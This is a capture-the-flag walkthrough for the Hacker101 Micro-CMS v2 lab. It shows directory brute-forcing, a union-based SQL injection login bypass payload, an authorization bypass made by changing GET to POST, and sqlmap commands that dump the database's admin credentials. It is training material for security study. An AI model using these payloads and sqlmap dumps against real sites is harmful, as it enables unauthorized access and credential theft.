What
A CMS with Python backend, prone for SQL injection.
Difficulty: Moderate
Flag0
Hint0: Regular users can only see public pages
Start with wandering around the site, visiting all available pages to feed site map in Burp.
As we can see on Changelog page (/page/1), user authentication has been implemented, so by default, only admins can add or edit pages.
As a regular user, we can visit (load without authenticating on /login) the following pages:
/home/login/page/1/page/2
Can’t hurt, if we run gobuster and dirb too, right? Only /logout found by both in addition to what we had before.
gobuster dir -u https://IAMSOSORRY.ctf.hacker101.com/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -z -t 100
Let’s run dirb too.
dirb https://IAMSOSORRY.ctf.hacker101.com/
It made me a bit upset that dirb did not found anything under /page, so I quickly modified my wordlist-generator script (used in Postbook) to create an index list [1-100]. Running dirb with this wordlist on /page, revealed /page/3 which is Forbidden.
dirb https://IAMSOSORRY.ctf.hacker101.com/page/ ~/scripts/numbers100.txt
Hint1: Getting admin access might require a more perfect union
The hint tells us that the login page is vulnerable for SQL Injection. Starting with a basic payload (') in Username field generated an error message.
Traceback (most recent call last):
File "./main.py", line 145, in do_login
if cur.execute('SELECT password FROM admins WHERE username=\'%s\'' % request.form['username'].replace('%', '%%')) == 0:
File "/usr/local/lib/python2.7/site-packages/MySQLdb/cursors.py", line 255, in execute
self.errorhandler(self, exc, value)
File "/usr/local/lib/python2.7/site-packages/MySQLdb/connections.py", line 50, in defaulterrorhandler
raise errorvalue
ProgrammingError: (1064, "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ';'' at line 1")
Bad practice, if clients can see the error message details due to error reporting is active on a live page. For us, it suggests that we’re facing with a MySQL database server in the backend.
Here you can see a complete list of payloads to be used against MySQL database.
Following the hint, we should focus on Union Based section of the page. Few documents worth a look before continuing:
- this gem from PortSwigger,
- Invicti's SQL Injection Cheat Sheet,
- Advanced SQL Injection: Union based from VK9 Security,
Let’s determine how many columns are being returned from the original query with
' order by 1;' order by 2;' order by 3;
The first query results an “Unknown user” message, the others end up with error details. We need only one column.
If we try with
' union select null;' union select null,null;
' union select null,null,null;
as Name, we can see, that the first union query throws an “Invalid password”, the others give us the error details.
Look at the error message again. The query behind the scenes is
SELECT password FROM admins WHERE username='[username field]' AND password='[password field]'
Our Union-based payload will replace the second part of the original query, from the username’s closing ', something like this:
SELECT password FROM admins WHERE username=' [payload]
As we need only one column, let’s set a fix value for password that we will provide in the password field (no username needed):
SELECT password FROM admins WHERE username=’ ' UNION SELECT '123' AS password#
Username: ' UNION SELECT '123' AS password# #you don’t need uppercase letters..
Password: 123
Here you can see a more detailed answer on why/how above query works.
If you catch the request in Burp, you’ll see this:
username=%27+union+select+%27123%27+as+password%23&password=123
Fantastic, we’re in:
Hint2: Knowing the password is cool, but there are other approaches that might be easier
After logon, an additional page is added to the links: /page/3, which was forbidden before.
The page reveals the first FLAG.
Alternatively, we can also reveal this FLAG with sqlmap, when fetching pages table:
sqlmap -r ~/h101/micro-cms_v2/login.txt -D level2 -T pages --dump --random-agent --threads 10
See more details for sqlmap in Flag2.
Flag1
Hint0: What actions could you perform as a regular user on the last level, which you can’t now?
We were able to create and edit pages. On this level, we have to logon first.
Hint1: Just because request fails with one method doesn’t mean it will fail with a different method
When it comes to changing request method, our usual friends will be Burp and cURL.
With Burp, we can intercept the request and replace GET with POST.
cURL’s default request method is (also) GET. We can change request method to POST with -X POST.
Hint2: Different requests often have different required authorization
Burp (intercept the request):
cURL:
Change the request method from GET to POST.
Burp:
Another FLAG.
cURL:
Flag2
Hint0: Credentials are secret, flags are secret. Coincidence?
We already know that the login fields are vulnerable for injection, but an SQLi challenge wouldn’t be complete without using sqlmap - also, there is much to learn even from it’s output.
First, I’ve saved the GET request with Burp Intercept as login.txt (username=user and password=pass).
Let’s see how sqlmap is listing databases.
sqlmap -r ~/h101/micro-cms_v2/login.txt --dbs --random-agent --threads 10
We have the database name (level2), now get the tables with:
sqlmap -r ~/h101/micro-cms_v2/login.txt -D level2 --tables --random-agent --threads 10
Let’s dump admins table.
sqlmap -r ~/h101/micro-cms_v2/login.txt -D level2 -T admins --dump --random-agent --threads 10
Using the credentials above for login, we see the third FLAG.
Takeaway(s)
- Use “Incorrect username and/or password” instead revealing which of the two fields has invalid value
- Try changing request method between GET and POST
- Don’t rely on automated tools, understand what they are doing
- Experience with different tools for the same task